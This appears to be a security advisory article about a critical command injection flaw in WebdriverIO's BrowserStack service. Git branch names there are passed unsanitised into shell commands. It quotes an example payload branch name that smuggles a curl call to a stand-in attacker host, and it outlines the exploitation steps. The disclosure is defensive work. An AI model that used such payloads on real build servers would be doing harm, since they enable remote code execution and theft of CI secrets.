9.8 Severity Alert: Malicious Git Branches Can Hijack Your WebdriverIO Build Servers

A critical security vulnerability has been found in WebdriverIO, a popular open-source test automation framework used for end-to-end and component testing. The flaw, tracked as CVE-2026-25244, carries a CVSS score of 9.8, signaling a “Critical” risk that could allow attackers to seize control of developer machines and build servers.

The issue resides specifically within the @wdio/browserstack-service package. It is a classic Command Injection vulnerability that occurs during test orchestration when the framework attempts to process git metadata.

The root cause is surprisingly simple: user-controlled git branch names are directly interpolated into shell commands via execSync() without any prior sanitization.

“User-controlled git branch names are directly interpolated into execSync() calls without sanitization. Git allows branch names to contain special characters, that can be used for command injection,” the advisory explains.

To exploit this, an attacker doesn’t need complex exploits—just a creatively named git branch. By creating a branch with a name like main;curl${IFS}evil.com/evil.sh, an attacker can trick the system into executing arbitrary code.

The step-by-step infection chain:

1. Preparation: An attacker creates a malicious repository containing a branch name with a shell payload.
2. Configuration: WebdriverIO is configured to use this repository (often via testOrchestrationOptions.runSmartSelection).
3. Extraction: The framework runs getGitMetadataForAISelection() and pulls the malicious branch name.
4. Injection: The unsanitized name is dropped into a shell command.
5. Execution: The shell interprets the special characters (like 😉 and runs the attacker’s commands instead of just checking the git diff.

Because WebdriverIO is a staple in CI/CD pipelines, the reach of this vulnerability is extensive. Successful exploitation can lead to:

• Remote Code Execution (RCE): Complete takeover of build servers or local developer environments.
• Data Exfiltration: Theft of sensitive source code, SSH keys, and configuration files.
• Credential Theft: Exposure of environment variables and CI/CD secrets.
• Supply Chain Attacks: The ability to modify build artifacts before they reach production.

Security researchers have identified the vulnerable code in the helpers.ts file of the BrowserStack service. If your team uses WebdriverIO for browser-based automation, you must check your versions immediately.

• Affected Versions: All versions up to and including 9.23.2.
• The Fix: Update to 9.24.0 or later.